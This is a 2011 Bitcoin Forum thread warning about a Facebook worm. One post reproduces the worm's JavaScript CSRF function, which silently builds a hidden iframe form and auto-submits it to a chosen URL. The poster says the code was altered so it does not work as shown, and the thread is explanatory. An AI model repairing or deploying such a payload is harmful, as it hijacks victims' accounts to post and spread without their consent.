Bitcoin Forum
Author Topic: XSS / CSFR Facebook hostile-page  (Read 862 times)
BCEmporium
July 03, 2011, 11:31:31 PM
 #1

For people who keep wondering about XSS and CSRF, here's an example of what it can do. This example is a new Facebook worm, which spreads by pointing users at this page: hxxp://greatlolfacehot.com/ (link replaced with hxxp). Make sure you have JavaScript disabled before you try it, then you can look at the source.

This is also a warning, just in case a friend of yours has posted some crap like this to his wall or yours.
joepie91
July 06, 2011, 05:16:49 PM
 #2

Sharing the part that does the CSRF here, for those who are interested...

Code:
function jacks(site,params){
var div = document.createElement('div');
div.innerHTML = '<iframe></iframe>';
document.body.appendChild(div);
var iframe = div.firstChild;
var iframeDocument = iframe.documentHandler;
iframeDocument.open();
iframeDocument.close();
var form = iframeDocument.createElement('form');
iframeDocument.body.appendChild(form);
form.setAttribute('action',site);
for (param in params){
var field = iframeDocument.createElement('input');
field.setAttribute('type', 'hidden');
field.setAttribute('name', param);
field.setAttribute('value', params[param]);
form.appendChild(field);
}
form.submit();
}
What this code roughly does is create an iframe with a form that is set to a specific Facebook sharing URL (which is also called by their on-site sharing functionality), insert a specific set of "parameters" (form fields) and corresponding values, and automatically submit the form. This is all done in the background, of course. The target URL and parameters can be specified in this function.

The code I posted here was edited so that it needs some work before it works, to discourage script kiddies.

EDIT: Of course this could be executed from any page. You could be visiting some random page with comics, and it could technically have this code in it.

Like my post(s)? 12TSXLa5Tu6ag4PNYCwKKSiZsaSCpAjzpu Smiley
Quote from: hawks5999
I just can't wait for fall/winter. My furnace never generated money for me before. I'll keep mining until my furnace is more profitable.